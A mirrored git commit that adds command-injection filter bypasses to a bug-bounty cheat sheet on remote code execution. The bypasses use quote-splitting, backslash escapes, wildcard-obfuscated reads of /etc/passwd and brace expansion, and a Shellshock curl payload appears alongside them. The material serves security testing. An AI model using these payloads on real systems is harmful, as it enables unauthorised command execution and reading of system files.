mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-22 02:53:06 +00:00
Update rce.md
Added some bypasses
This commit is contained in:
parent
62b8a6623b
commit
71007f84c8
1 changed files with 22 additions and 1 deletions
|
@ -10,6 +10,27 @@ strіng
|
|||
|
||||
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
|
||||
|
||||
**Basic Bypasses**
|
||||
|
||||
```
|
||||
i'''d
|
||||
i"""d
|
||||
```
|
||||
|
||||
```
|
||||
\l\s -l\a\h
|
||||
```
|
||||
|
||||
```
|
||||
cat /e?c/p?ss??
|
||||
cat /e??/??ss*
|
||||
```
|
||||
|
||||
```
|
||||
{ls,}
|
||||
{ls,-a}
|
||||
```
|
||||
|
||||
**Shellshock Bug**
|
||||
|
||||
```bash
|
||||
|
@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru
|
|||
|
||||
```zsh
|
||||
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
|
||||
```
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue